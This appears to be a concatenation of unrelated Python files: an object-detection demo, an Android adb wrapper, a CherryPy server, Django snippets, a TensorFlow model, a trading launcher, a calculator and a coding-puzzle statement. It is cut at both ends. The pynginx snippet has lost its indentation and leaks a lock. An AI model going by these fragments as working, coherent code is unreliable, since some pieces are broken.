    opt.debug = max(opt.debug, 1)
    detector = detector_factory[opt.task](opt)

    is_video = opt.demo == 'webcam' or \
        opt.demo[opt.demo.rfind('.') + 1:].lower() in video_ext
    if is_video:
        source = 0 if opt.demo == 'webcam' else opt.demo
        cam = cv2.VideoCapture(source)
        detector.pause = False
        while True:
            _, frame = cam.read()
            cv2.imshow('input', frame)
            ret = detector.run(frame)
            # Per-frame timing summary for each pipeline stage.
            print(''.join('{} {:.3f}s |'.format(stat, ret[stat]) for stat in time_stats))
            if cv2.waitKey(1) == 27:
                return  # esc to quit
    else:
        if os.path.isdir(opt.demo):
            image_names = [
                os.path.join(opt.demo, file_name)
                for file_name in sorted(os.listdir(opt.demo))
                if file_name[file_name.rfind('.') + 1:].lower() in image_ext
            ]
        else:
            image_names = [opt.demo]
        person_id = 1  # COCO class id for "person" in the results dict
        seq_no = 1
        detector.pause = False
        for image_name in image_names:
            ret = detector.run(image_name)
            bbox = ret['results'][person_id]
            # Convert corner format (x1, y1, x2, y2) to (x, y, w, h) in place.
            bbox[:, 2] = bbox[:, 2] - bbox[:, 0]
            bbox[:, 3] = bbox[:, 3] - bbox[:, 1]
            # Emit one MOT-format line per detection box.
            for det in bbox:
                opt.det_result_file.write("%d,-1, %f, %f, %f, %f, %f, -1,-1,-1\n" % (
                    seq_no, det[0], det[1], det[2], det[3], det[4]))
            print(''.join('{} {:.3f}s |'.format(stat, ret[stat]) for stat in time_stats))
            seq_no += 1
        opt.det_result_file.close()
if __name__ == '__main__':
    # Configure a ctdet (CenterNet detection) run with the DLA-34 backbone.
    MODEL_PATH = './CenterNet/models/ctdet_coco_dla_2x.pth'
    ARCH = 'dla_34'
    # MODEL_PATH = './CenterNet/models/ctdet_coco_resdcn18.pth'
    # ARCH = 'resdcn_18'
    TASK = 'ctdet'  # or 'multi_pose' for human pose estimation
    opt = opts().init('{} --load_model {} --arch {}'.format(TASK, MODEL_PATH, ARCH).split(' '))

    seq_path = '../data/2DMOT17det/test/MOT17-{0:02d}/img1/'
    det_result_path = './det_results/MOT17-{}.txt'
    start_seq, end_seq = 1, 14
    # Run detection for each sequence directory that exists, writing one
    # MOT-format detection file per sequence.
    for seq_idx in range(start_seq, end_seq + 1):
        opt.demo = seq_path.format(seq_idx)
        if os.path.isdir(opt.demo):
            opt.det_result_file = open(det_result_path.format(seq_idx), 'w')
            demo(opt)
|
# -*- coding:utf-8 -*-
import subprocess
import sys
sys.path.append('..')
import lib.Utils as U
import os
import re
class adb():
    """Thin wrapper around the `adb` command-line tool (Python 2 module).

    All commands are executed through lib.Utils.cmd and the raw Popen object
    (or its parsed output) is returned. NOTE(review): several helpers pipe
    through `findstr`, which is a Windows filter -- confirm the target
    device's shell actually provides it.
    """
    def __init__(self,device=''):
        # An empty device id means "the single connected device"; otherwise
        # every call targets the device via `adb -s <device>`.
        if device =='':
            self.device = ''
        else:
            self.device = "-s %s" % device
    def adb(self,args):
        """Run an arbitrary `adb <args>` command."""
        return U.cmd('adb %s %s' % (self.device,str(args)))
    def logcat(self,log_path):
        """Start streaming time-stamped logcat output into log_path (backgrounded)."""
        return self.adb('logcat -v time > %s&' % log_path)
    def logcat_c(self):
        """Clear the device's logcat buffer."""
        return self.adb('logcat -c')
    def shell(self,args):
        """Run a command on the device via `adb shell`."""
        cmd = 'adb %s shell %s' %(self.device,str(args))
        return U.cmd(cmd)
    def connect(self,device):
        """Connect to a TCP/IP device; a ':port' suffix is stripped first."""
        device = device.split(':')[0]
        return U.cmd('adb connect %s' % device)
    def get_cpu(self,package_name):
        """Return the package's CPU usage (integer percent) parsed from `top`.

        NOTE(review): loops forever if no line ends with package_name.
        """
        p = self.shell('top -n 1 -d 0.5 | findstr %s' % package_name)
        while True:
            r = p.stdout.readline().strip().decode('utf-8')
            if r.endswith(package_name):
                # Collapse repeated spaces, then take the CPU column.
                lst = []
                for i in r.split(' '):
                    if i:
                        lst.append(i)
                return int(lst[2].split('%',1)[0])
    def get_current_app_mem(self,package_name):
        """Return the package's resident memory in KB parsed from `top`.

        NOTE(review): loops forever if no line ends with package_name.
        """
        p = self.shell('top -n 1 -d 0.5 | findstr %s' % package_name)
        while True:
            r = p.stdout.readline().strip().decode('utf-8')
            if r.endswith(package_name):
                lst = []
                for i in r.split(' '):
                    if i:
                        lst.append(i)
                return int(lst[6].split('K')[0])
    def get_total_mem(self):
        """Return the device's total memory in KB from /proc/meminfo.

        NOTE(review): loops forever if no 'MemTotal' line appears.
        """
        p = self.shell('cat proc/meminfo')
        while True:
            r = p.stdout.readline().strip().decode('utf-8')
            if r and 'MemTotal' in r:
                lst = []
                for i in r.split(' '):
                    if i:
                        lst.append(i)
                return int(lst[1])
    def get_mem(self,package_name):
        """Return the package's memory usage as an integer percent of total,
        or None when either measurement fails (broad except by design)."""
        try:
            return int(self.get_current_app_mem(package_name) / float(self.get_total_mem())*100)
        except:
            return None
    def get_sceenshot(self,screen_file):
        """Capture the screen on-device and pull the PNG to screen_file."""
        os.system('adb %s shell screencap -p /data/local/tmp/screencap.png' % self.device)
        os.system('adb %s pull /data/local/tmp/screencap.png %s' %(self.device,screen_file))
        return screen_file
    def get_app_version(self,packageName):
        """Return the package's versionName from `dumpsys package`, or None."""
        for line in self.shell('dumpsys package %s' % packageName).stdout.readlines():
            if 'versionName' in line:
                return line.split('=',2)[1].strip()
    def get_device_name(self):
        """Return the device model (ro.product.model)."""
        t = self.shell('getprop ro.product.model').stdout.readlines()
        return ''.join(t).strip()
    def get_disk(self):
        """Return used/free space of the /data partition as a display string."""
        for s in self.shell('df').stdout.readlines():
            if '/data' in s:
                lst=[]
                for i in s.split(' '):
                    if i:
                        lst.append(i)
                return 'Used:%s, Free:%s' % (lst[2],lst[3])
    def get_wifi_name(self):
        """Return the SSID of the current Wi-Fi network, or None."""
        for line in self.shell('dumpsys wifi').stdout.readlines():
            if line.startswith('mWifiInfo'):
                wifi_name = re.findall(r'SSID:([^"]+), BSSID',line)
                if not wifi_name:
                    return None
                else:
                    return wifi_name[0].strip()
    def get_android_version(self):
        """Return the Android release version (ro.build.version.release)."""
        return self.shell('getprop ro.build.version.release').stdout.read().strip()
    def get_screen_resolution(self):
        """Return (width, height) parsed from dumpsys, or 1920x1080 fallback."""
        pattern = re.compile(r"\d+")
        out = self.shell("dumpsys display | findstr PhysicalDisplayInfo" ).stdout.read()
        display = pattern.findall(out)
        if display:
            return int(display[0]),int(display[1])
        else:
            return 1920,1080
if __name__ == '__main__':
    # Ad-hoc smoke test; requires a device reachable over TCP/IP debugging.
    # NOTE(review): Python 2 print statement -- this module is Python 2 only.
    s = adb('192.168.1.100:5555')
    print s.get_screen_resolution()
|
# coding=utf-8
from PIL import Image, ImageSequence
import sys, os
from PIL.ImageDraw import ImageDraw
from PIL.ImageFont import truetype
outputdir = "test/Arch_sigmaS/"
#Read images and IQA
# Map each sigmaS value (parsed from the file name "<value>.png") to its path.
images = {float(x[0:len(x)-4]): os.path.join(outputdir, x) for x in os.listdir(outputdir) if x.lower().endswith("png")}
#iqas = {x: float(open(y+"_iqa.txt", 'r').read()) for x,y in images.iteritems()}
# NOTE(review): dict.iteritems is Python 2 only -- this script is Python 2.
images = {x: Image.open(y) for x,y in images.iteritems()}
#Annotate images
def annotate(image, text):
    """Draw *text* in white at the top-left corner of *image*, in place."""
    draw = ImageDraw(image)
    # Assumes Helvetica.otf is resolvable from the working directory -- TODO confirm.
    font = truetype("Helvetica.otf", 16)
    draw.text((0, 0), text, (255, 255, 255), font=font)
idx = 0
# Annotate each image with its sigmaS value and save a zero-padded numbered copy.
for x in sorted(images.keys()):
    annotate(images[x], "sigmaS="+str(x))#+";IQA="+str(iqas[x]))
    images[x].save(os.path.join(outputdir, str(idx).zfill(4)+"_annotated.png"))
    idx += 1
# Assemble the annotated frames into an animated GIF (requires ImageMagick's `convert`).
os.system("convert -delay 100 "+str(outputdir)+"*_annotated.png "+str(outputdir)+"animated.gif")
os.system("rm " + str(outputdir) + "*_annotated.png") |
# encoding: utf-8
import cherrypy
from Residencia import * # @UnusedWildImport
import threading as t # @UnusedWildImport
class ServerPrincipal:
    """CherryPy facade exposing the residence (home-automation) operations
    over HTTP. User-facing response strings are intentionally in Portuguese.
    """
    def __init__(self, residence):
        self.residence = residence
    def index(self):
        """Landing page."""
        return "Welcome to Control multimedia Universal!"
    index.exposed = True
    def default(self): # this acts like a catch-all / fallback handler
        return "Invalid Data"
    default.exposed = True # makes the method visible on the server
    @cherrypy.tools.allow(methods=['POST'])
    def addRoom(self, nameRoom, ip, port):
        """Register a room; reports whether it already existed."""
        if(self.residence.addRoom(nameRoom, ip, port)):
            return "Comodo adicionado"
        else:
            return "Comodo já existe"
    addRoom.exposed = True
    @cherrypy.tools.allow(methods=['POST'])
    def removeRoom(self, nameRoom):
        """Remove a room; reports whether it existed."""
        if (self.residence.removeRoom(nameRoom)):
            return "Comodo removido"
        else:
            return "Comodo nao existe"
    removeRoom.exposed = True
    @cherrypy.tools.allow(methods=['POST'])
    def sendCommand(self, nameRoom, equipment, command):
        """Forward a command to an equipment in the given room."""
        return self.residence.sendCommand(nameRoom, equipment, command)
    sendCommand.exposed = True
    @cherrypy.tools.allow(methods=['POST'])
    def setRoomOfControl(self, nameRoom):
        """Select the room that the controller currently targets."""
        return self.residence.setRoomOfControl(nameRoom)
    setRoomOfControl.exposed = True
    def getRooms(self):
        """Return the room names joined by '|'."""
        return "|".join(self.residence.getRooms())
    getRooms.exposed = True
    def powerOffEquipmentsRoom(self):
        return self.residence.powerOffEquipmentsRoom()
    powerOffEquipmentsRoom.exposed = True
# Module-level startup: one Residencia instance is shared between the HTTP
# handlers and the background power-off thread.
residence = Residencia()
class MyThread(t.Thread):
    def run(self):
        # Runs the power-off routine in the background so it does not block
        # the CherryPy server startup below.
        residence.powerOffEquipmentsRoom()
mt = MyThread()
mt.start()
cherrypy.config.update("config.cfg")
cherrypy.quickstart(ServerPrincipal(residence))
|
# -*- coding: utf-8 -*-
from pynginx.schedule.base import Schedule as BaseSchedule
import time
from pynginx.client.stream import Stream
class Schedule(BaseSchedule):
def index(self,value):
if self.lock.acquire():
if 0 == self.length:
self.lock.release()
return -1
return 0
def get(self,value):
sock = None
while True:
i = self.index(value)
while -1 == i:
# 如果没有可用server,则会一直等待了。
print 'wait for server'
time.sleep(self.interval)
i = self.index(value)
host,port = self.cache[i]
print host,port
try:
sock = Stream(host,port).sock
except:
self.delete((host,port))
continue
break
return sock
|
from pathlib import Path
TEMPLATE = "\\input{{{0}}}"
PATH_TEXT = Path("src/text")


def merge_text_files(text, filenames):
    """Inline each ``\\input{...}`` directive in *text* with the referenced
    file's content, for every path in *filenames*."""
    for tex_path in filenames:
        # Reconstruct the directive exactly as it appears in the document:
        # the path relative to PATH_TEXT's parent, without the .tex suffix.
        rel_dir = tex_path.parent.relative_to(PATH_TEXT.parent)
        directive = TEMPLATE.format("{}/{}".format(rel_dir, tex_path.stem))
        with open(tex_path, "r") as handle:
            body = handle.read()
        text = text.replace(directive, body)
    return text
if __name__ == "__main__":
    # Read the master manuscript and inline its \input'ed sections,
    # including the two sub-section directories, then write the merged file.
    with (PATH_TEXT / "../ms.tex").open("r") as f:
        text = f.read()
    filenames = PATH_TEXT.glob("*.tex")
    text = merge_text_files(text=text, filenames=filenames)
    filenames = (PATH_TEXT / "2-package-subsections").glob("*.tex")
    text = merge_text_files(text=text, filenames=filenames)
    filenames = (PATH_TEXT / "3-applications-subsections").glob("*.tex")
    text = merge_text_files(text=text, filenames=filenames)
    path = PATH_TEXT / ".."
    path.mkdir(exist_ok=True)
    with (path / "ms-review.tex").open("w") as f:
        f.write(text)
|
import pandas as pd
import numpy as np
import cv2
import os
import glob
import sys
import subprocess
from matplotlib import cm
def smooth_track(track_data):
    """Smooth x/y/width/height per track (tracks with more than 12 rows only).

    Args:
        track_data: DataFrame with columns track_id, x, y, width, height.

    Returns:
        A new concatenated DataFrame of the smoothed tracks, or an empty
        list when no track is long enough (kept for caller compatibility).
    """
    smoothed = []
    for track_id in track_data['track_id'].unique():
        # Bug fix: copy explicitly -- assigning into a boolean-indexed slice
        # triggers pandas' SettingWithCopyWarning and risks mutating the
        # caller's frame.
        tid = track_data[track_data['track_id'] == track_id].copy()
        if len(tid) > 12:
            for col in ('x', 'y', 'width', 'height'):
                tid[col] = smooth_(tid[col])
            smoothed.append(tid)
    if smoothed:
        return pd.concat(smoothed)
    return []
def smooth_(x, window_len=12, window='hanning'):
    """Smooth the data using a window of the requested size.

    This method is based on the convolution of a scaled window with the
    signal. The signal is extended with reflected copies at both ends so
    that transient parts are minimized at the beginning and end of the
    output signal.

    Args:
        x: 1-D input signal.
        window_len: dimension of the smoothing window; should be an odd integer.
        window: one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman';
            'flat' produces a moving average.

    Returns:
        The smoothed signal, same length as the input (or x unchanged when
        window_len < 3).

    Raises:
        ValueError: for non-1-D input, input shorter than the window, or an
            unknown window name.

    Example:
        t = linspace(-2, 2, 0.1)
        x = sin(t) + randn(len(t)) * 0.1
        y = smooth_(x)

    See also:
        numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman,
        numpy.convolve, scipy.signal.lfilter
    """
    if x.ndim != 1:
        raise ValueError("smooth only accepts 1 dimension arrays.")
    if x.size < window_len:
        raise ValueError("Input vector needs to be bigger than window size.")
    if window_len < 3:
        return x
    if window not in ('flat', 'hanning', 'hamming', 'bartlett', 'blackman'):
        # Fix: corrected "is on of" typo in the error message.
        raise ValueError("Window is one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'")
    # Pad with reflected copies of the signal at both ends.
    s = np.r_[x[window_len - 1:0:-1], x, x[-2:-window_len - 1:-1]]
    if window == 'flat':  # moving average
        w = np.ones(window_len, 'd')
    else:
        # Fix: look up the numpy window function via getattr instead of eval.
        w = getattr(np, window)(window_len)
    y = np.convolve(w / w.sum(), s, mode='valid')
    # Trim the padding so the output aligns with (and matches) len(x).
    return y[(window_len // 2 - 1):-(window_len // 2)]
def get_frame_rate(filename):
    """Return the video's frame rate via ffprobe, or -1 on failure.

    NOTE(review): the parsing relies on str() of the raw bytes plus the
    hard-coded slice [1:-4] of ffprobe's flat output -- fragile; it assumes
    output of the form streams.stream.0.r_frame_rate="num/den".
    Requires ffprobe on PATH.
    """
    if not os.path.exists(filename):
        sys.stderr.write("ERROR: filename %r was not found!" % (filename,))
        return -1
    out = subprocess.check_output(
        ["ffprobe", filename, "-v", "0", "-select_streams", "v", "-print_format", "flat", "-show_entries",
         "stream=r_frame_rate"])
    # Strip the surrounding quotes/newline and split "num/den".
    rate = str(out).split('=')[1].strip()[1:-4].split('/')
    if len(rate) == 1:
        return float(rate[0])
    if len(rate) == 2:
        return float(rate[0]) / float(rate[1])
    return -1
def frames2vid(frames_dir, video_fp, suffix=''):
    """Encode the numbered frames in frames_dir into an H.264 video, then mux
    in the audio track from the original video_fp.

    NOTE(review): writes and removes a fixed 'tmp.mp3' in the CWD, so
    concurrent runs clobber each other; assumes ffmpeg on PATH. Joining
    frames_dir with video_fp below produces odd output paths when video_fp
    contains directory components -- confirm with callers.
    """
    fps = get_frame_rate(video_fp)
    exp_video = os.path.join(frames_dir, 'out.mp4')
    exp_audio_video = os.path.join(frames_dir, video_fp.replace('.mp4', f'{suffix}.mp4'))
    # Re-encode the %06d.jpg frame sequence at the source frame rate.
    cmd = 'ffmpeg -y -r {} -start_number 1 -i {}/%06d.jpg -c:v libx264 -vf fps={} -pix_fmt yuv420p {}'.format(fps,
                                                                                                              frames_dir,
                                                                                                              fps,
                                                                                                              exp_video)
    process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE)
    process.communicate()
    # Extract the source audio, then remux it with the re-encoded video.
    audio_cmd = 'ffmpeg -y -i %s -vn -ab 256 tmp.mp3' % video_fp
    process = subprocess.Popen(audio_cmd.split(), stdout=subprocess.PIPE)
    process.communicate()
    replace_audio = 'ffmpeg -y -i %s -i %s -c:v copy -map 0:v:0 -map 1:a:0 %s' % (exp_video, 'tmp.mp3', exp_audio_video)
    process = subprocess.Popen(replace_audio.split(), stdout=subprocess.PIPE)
    process.communicate()
    os.remove('tmp.mp3')
def write_tracks(track_data, frame_dir, width, height, conf=False, action_data=None):
    """Draw tracking boxes (and optional action labels) onto the frame images
    in frame_dir, overwriting each frame file in place.

    Args:
        track_data: rows with frame_id, track_id, x, y, width, height (and
            indiv_id when action_data is given); assumed sorted by frame_id.
        frame_dir: directory of %06d.jpg frames.
        width, height: NOTE(review): currently copied into unused locals
            (the acc_height/acc_width scaling code is commented out).
        conf: when True, track_id is treated as a confidence for coloring.
        action_data: optional rows with f1, f2, indiv_id, action giving the
            action label active during [f1, f2] for an individual.
    """
    acc_replace = {'crack_nut': 'NUT CRACK', 'eating': 'EAT', 'Drumming': 'DRUM'}
    prev_id = -1
    colormap = [cm.Pastel1.__dict__['colors'][idx] for idx in range(9)]
    for idx, row in track_data.iterrows():
        curr_id = '%06d.jpg' % (row['frame_id'])
        if prev_id != curr_id:
            # New frame: load its image once and keep drawing on it until
            # the frame id changes again.
            img = cv2.imread(os.path.join(frame_dir, curr_id))
            try:
                acc_height, acc_width = img.shape[:2]
            except:
                # NOTE(review): debugger left in -- triggers when the frame
                # file is missing (img is None).
                import pdb; pdb.set_trace()
            # height_s = acc_height / height
            # width_s = acc_width / width
            height_s = height
            width_s = width
            prev_id = curr_id
        track_id = row['track_id'] + 1
        if track_id != -1:
            if conf:
                color = colormap[int(track_id * 8)]
            else:
                color = colormap[track_id % 9]
            # matplotlib colors are 0-1 floats; OpenCV wants 0-255.
            color = [c * 255 for c in color]
            im_x, im_y, im_w, im_h = int(row['x']), int(row['y']), int(
                row['width']), int(row['height'])
            cv2.rectangle(img, (im_x, im_y), (im_x + im_w, im_y + im_h), color, 2)
            if action_data is None:
                # Label the box with its track id at the top-right corner.
                text_width, text_height = \
                    cv2.getTextSize(str(track_id), cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, thickness=1)[0]
                tbox_coords = ((im_x + im_w - text_width + 4, im_y), (im_x + im_w, im_y - text_height - 4))
                cv2.rectangle(img, tbox_coords[0], tbox_coords[1], color, cv2.FILLED)
                cv2.putText(img, str(track_id), (im_x + im_w - text_width + 4, im_y), cv2.FONT_HERSHEY_SIMPLEX, 1,
                            (0, 0, 0), lineType=cv2.LINE_AA)
            if action_data is not None:
                # Find the action (if any) active for this individual at this frame.
                adf = action_data[action_data['f1'] <= row['frame_id']]
                adf = adf[adf['f2'] >= row['frame_id']]
                adf = adf[adf['indiv_id'] == row['indiv_id']]
                if len(adf) > 0:
                    action_text = acc_replace[adf['action'].iloc[0]]
                    text_width, text_height = \
                        cv2.getTextSize(action_text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, thickness=1)[0]
                    tbox_coords = ((im_x, im_y - 2), (im_x + text_width + 4, im_y - text_height - 4))
                    cv2.rectangle(img, tbox_coords[0], tbox_coords[1], (255, 255, 255), cv2.FILLED)
                    cv2.putText(img, action_text, (im_x + 2, im_y - 4), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0),
                                lineType=cv2.LINE_AA)
        # NOTE(review): the frame is rewritten for every row, and twice for
        # the last one -- the second imwrite below is redundant.
        cv2.imwrite(os.path.join(frame_dir, curr_id), img)
        cv2.imwrite(os.path.join(frame_dir, curr_id), img)
def create_det_vid(csv_fp, frame_video_dir, video_fp, smooth=True):
    """Overlay tracking boxes from csv_fp onto the frames in frame_video_dir
    and re-encode them (with the original audio) into a video.

    Args:
        csv_fp: CSV with frame_id, track_id, x, y, width, height columns.
        frame_video_dir: directory of numbered .jpg frames (%06d.jpg).
        video_fp: source video path (used for fps and audio).
        smooth: when True, smooth each track's coordinates first.
    """
    data = pd.read_csv(csv_fp)
    data.sort_values('frame_id', inplace=True)
    if smooth:
        data = smooth_track(data)
    # Derive the frame dimensions from the first frame found.
    imgs_dir = os.path.join(frame_video_dir, '*.jpg')
    img_ex = cv2.imread(glob.glob(imgs_dir)[0])
    height, width = img_ex.shape[:2]
    write_tracks(data, frame_video_dir, width, height)
    frames2vid(frame_video_dir, video_fp)
    #for file in glob.glob(os.path.join(frame_video_dir, '*.jpg')):
    #    os.remove(file)
if __name__ == "__main__":
    # Bug fix: the entry point previously called undefined `create`; the
    # function defined above is create_det_vid (NameError at runtime).
    create_det_vid(
        "results/tmp/19_mini.mp4.full.csv",
        "tmp/19_mini.mp4",
        "19_mini.mp4"
    )
from django.db import models
# Create your models here.
class Lawning(models.Model):
    """A lawn(ing) course record: instructor, participant, image, category,
    and start date. Images are stored under MEDIA_ROOT/pics."""
    instructor_name = models.CharField(max_length = 100)
    part_name = models.CharField(max_length = 100)
    #partname is participants name
    images = models.ImageField(upload_to = "pics")
    category = models.TextField()
    started_from =models.DateField('started_from')
#nb:after creating your models go to pgadmin
#create a database with your project name them makemigrations |
from django.contrib import admin
from django.urls import path
from django.conf.urls import url, include
from django.contrib import admin
# add media url
from django.conf import settings
from django.conf.urls.static import static
# Django Rest Framework
from rest_framework import routers
from rest_framework_swagger.views import get_swagger_view
from api import views
app_name = 'server'

# DRF router: exposes CRUD endpoints for users, profiles and videos
# under the /main/video prefix below.
router = routers.DefaultRouter()
router.register('users', views.UserViewSet)
router.register('profiles', views.ProfileViewSet)
router.register('videos', views.VideoViewSet)

urlpatterns = [
    path('admin/', admin.site.urls),
    # Bug fix: corrected the user-visible API title typo ("Viedo" -> "Video").
    path('main/doc', get_swagger_view(title='Tape Video API')),
    path('main/video', include(router.urls)),
    path('login', views.login),
    path('signup', views.signup),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from dann_utils import *
import tensorflow as tf
class BcnnModel(object):
    """Simple MNIST Bilinear CNN model: two independent CNN feature streams
    combined by bilinear (outer-product) pooling, followed by a small MLP
    classifier (TensorFlow 1.x graph-mode code)."""

    def __init__(self, batch_size, pixel_mean):
        """batch_size: training batch size; pixel_mean: mean image subtracted
        from the uint8 input before scaling to [0, 1]."""
        self.pixel_mean = pixel_mean
        self.batch_size = batch_size
        self._build_model()

    def _build_model(self):
        """Build the placeholders, the two CNN streams, and the classifier."""
        # Inputs: uint8 RGB 28x28 images and one-hot labels over 10 classes.
        self.X = tf.placeholder(tf.uint8, [None, 28, 28, 3])
        self.y = tf.placeholder(tf.float32, [None, 10])
        X_input = (tf.cast(self.X, tf.float32) - self.pixel_mean) / 255.

        # First CNN stream for feature extraction.
        with tf.variable_scope('feature_extractor1'):
            W_conv0 = weight_variable([5, 5, 3, 32])
            b_conv0 = bias_variable([32])
            h_conv0 = tf.nn.relu(conv2d(X_input, W_conv0) + b_conv0)
            h_pool0 = max_pool_2x2(h_conv0)
            W_conv1 = weight_variable([5, 5, 32, 48])
            b_conv1 = bias_variable([48])
            h_conv1 = tf.nn.relu(conv2d(h_pool0, W_conv1) + b_conv1)
            self.h_pool1 = max_pool_2x2(h_conv1)

        # Second CNN stream: same architecture, independent weights.
        with tf.variable_scope('feature_extractor2'):
            W_conv0 = weight_variable([5, 5, 3, 32])
            b_conv0 = bias_variable([32])
            h_conv0 = tf.nn.relu(conv2d(X_input, W_conv0) + b_conv0)
            h_pool0 = max_pool_2x2(h_conv0)
            W_conv1 = weight_variable([5, 5, 32, 48])
            b_conv1 = bias_variable([48])
            h_conv1 = tf.nn.relu(conv2d(h_pool0, W_conv1) + b_conv1)
            self.h_pool2 = max_pool_2x2(h_conv1)

        # Bilinear pooling of the two streams, then class prediction.
        with tf.variable_scope('label_predictor'):
            # (batch, 14, 14, 48) -> (batch, 48, 196) for both streams.
            conv0 = tf.transpose(self.h_pool1, perm=[0, 3, 1, 2])
            conv0_1 = tf.transpose(self.h_pool2, perm=[0, 3, 1, 2])
            conv0 = tf.reshape(conv0, [-1, 48, 14 * 14])
            conv0_1 = tf.reshape(conv0_1, [-1, 48, 14 * 14])
            conv0_1_T = tf.transpose(conv0_1, [0, 2, 1])
            # Outer product of channel descriptors, averaged over positions.
            phi_I = tf.matmul(conv0, conv0_1_T)
            # Bug fix: tf.rehsape -> tf.reshape (typo raised AttributeError).
            phi_I = tf.reshape(phi_I, [-1, 48 * 48])
            phi_I = tf.divide(phi_I, 196.0)
            # Signed square root + L2 normalization of the bilinear vector.
            y_sqrt = tf.multiply(tf.sign(phi_I), tf.sqrt(tf.abs(phi_I) + 1e-12))
            z_l2 = tf.nn.l2_normalize(y_sqrt, dim=1)
            W_fc0 = weight_variable([48 * 48, 100])
            b_fc0 = bias_variable([100])
            h_fc0 = tf.nn.relu(tf.matmul(z_l2, W_fc0) + b_fc0)
            W_fc1 = weight_variable([100, 100])
            b_fc1 = bias_variable([100])
            self.visual_feature = tf.matmul(h_fc0, W_fc1) + b_fc1
            h_fc1 = tf.nn.relu(tf.matmul(h_fc0, W_fc1) + b_fc1)
            W_fc2 = weight_variable([100, 10])
            b_fc2 = bias_variable([10])
            logits = tf.matmul(h_fc1, W_fc2) + b_fc2
            self.pred = tf.nn.softmax(logits)
            # Bug fix: self.classify_labels was never defined anywhere in this
            # class; the ground-truth placeholder is self.y.
            # NOTE(review): if a DANN-style train/eval label split was
            # intended, reintroduce classify_labels explicitly.
            self.pred_loss = tf.nn.softmax_cross_entropy_with_logits(labels=self.y, logits=logits)
|
#!/usr/bin/env python3
import fxcmpy
import sys
import re
import os
from time import sleep
from modules.instrument import Instrument
from modules.color import colors
fx = None
def main():
    """Connect to FXCM and initialize an Instrument per currency pair.

    Bug fix: the connection is published to the module-level ``fx`` (via
    ``global``) so the crash handler in the __main__ block can close it;
    previously a local ``fx`` was bound and the global stayed None forever.
    """
    global fx
    fx = fxcmpy.fxcmpy(config_file="./config/fxcm.cfg")
    print("Connection to FXCM etablished")
    pair_re = re.compile(r"[A-Z]{3}/[A-Z]{3}")  # hoisted out of the loop
    if '--dev' in sys.argv:
        try:
            Instrument("EUR/USD", fx)
            print("[" + colors.OK + " OK " + colors.DEF + "] Initializing class for EUR/USD")
        except Exception:
            fx.close()
            sys.exit(1)
    else:
        instruments = fx.get_instruments()
        for i in instruments[0:5]:
            if pair_re.match(i):
                try:
                    Instrument(i, fx)
                    print("[" + colors.OK + " OK " + colors.DEF + "] Initializing class for {}".format(i))
                except Exception:
                    print("[" + colors.FAIL + " KO " + colors.DEF + "] Initializing class for {}".format(i))
                    sys.exit(1)
    while True:
        # Keep-alive loop. Bug fix: sleep instead of the previous
        # `while True: None` busy-wait that pinned a CPU core.
        sleep(1)
if __name__ == '__main__':
    try:
        main()
    except:
        # NOTE(review): this cleanup only works if main() publishes its
        # connection to the module-level `fx`; with a local binding the
        # global stays None and the connection is never closed here.
        print(colors.FAIL + "An unhandled error occured.\nAborting." + colors.DEF)
        if fx:
            fx.close()
        sys.exit(1)
|
#!/usr/bin/env python3
def add(num1, num2=0):
    """Return the sum of *num1* and *num2* (adds 0 by default)."""
    total = num1 + num2
    return total
def subtract(num1, num2=0):
    """Return *num1* minus *num2* (subtracts 0 by default)."""
    difference = num1 - num2
    return difference
def divide(num1, num2=1):
    """Return *num1* divided by *num2* (divides by 1 by default).

    Raises ZeroDivisionError when num2 is 0, like the `/` operator.
    """
    quotient = num1 / num2
    return quotient
def multiply(num1, num2=1):
    """Return the product of *num1* and *num2* (multiplies by 1 by default)."""
    product = num1 * num2
    return product
def _read_operand(prompt, default=1):
    """Prompt until the user enters an integer; empty input returns *default*.

    Bug fix: the original guarded the fallback with `if UnboundLocalError :`,
    which is always truthy (it tests the exception class object), so the
    "Only integer values allowed" message was unreachable and any garbage
    input silently became the default.
    """
    while True:
        raw = input(prompt)
        if raw.strip() == "":
            return default
        try:
            return int(raw)
        except ValueError:
            print("Only integer values allowed ... remember I am 'Primitive' ... Ha ha ha ha")


def _read_action():
    """Prompt until a valid operator name is entered; return it normalized."""
    while True:
        action = input("Choose Operator Add/Subtract/Multiply/Divide >>> ").lower().strip()
        if action in ('add', 'subtract', 'multiply', 'divide'):
            return action
        print("Invalid Operation requested, try again")


def main():
    """Interactive one-shot calculator: read two operands and an operator,
    then print the result."""
    print("Welcome to Primitive Calculator ..... \n")
    val1 = _read_operand("Enter 1st Operand (Default = 1) >>> ")
    action = _read_action()
    val2 = _read_operand("Enter 2nd Operand (Default = 1) >>> ")
    # Dispatch table: operator name -> (function, display symbol).
    operations = {
        "add": (add, "+"),
        "subtract": (subtract, "-"),
        "divide": (divide, "/"),
        "multiply": (multiply, "*"),
    }
    func, symbol = operations[action]
    print(f"{val1} {symbol} {val2} = {func(val1, val2)}")
main()
|
"""Instacart customers are able to set the delivery window during which they want to receive their groceries. There are always plenty of shoppers in the area ready to take a customer's order, but unfortunately they can't always do it right away. Before taking an order a shopper wants to ensure they will make it in time. They also don't want to stay idle, so arriving early isn't an option either.
Our task is to implement an algorithm that determines whether shoppers should take the given order or not.
For each shopper you know their travel speed, distance to the store and the estimated amount of time they will spend there. Figure out which of them can take the order, assuming it is known when the customer wants to receive the groceries and the distance between their house and the store.
Example
For order = [200, 20, 15] and shoppers = [[400, 50, 5], [600, 40, 10]]
the answer is delivery(order, shoppers) = [false, true].
The store is located 200 m away from the customer's house.
The customer will be ready to receive the groceries in 20 minutes, but they shouldn't be delivered more than 15 minutes late.
The first shopper is 400 m away from the store, his speed is 50 m/min, and he will spend 5 minutes in the store, which means that he will need (400 + 200) / 50 + 5 = 17 minutes to fulfill the order. This will leave him with 20 - 17 = 3 idle minutes, so he shouldn't take the order.
The second shopper is 600 m away from the store, his speed is 40 m/min, and he will spend 10 minutes in the store, which means it will take him (600 + 200) / 40 + 10 = 30 minutes to fulfill the order. The customer can wait for 20 + 15 = 35 minutes, which means that the shopper will make it in time.
[input] array.integer order
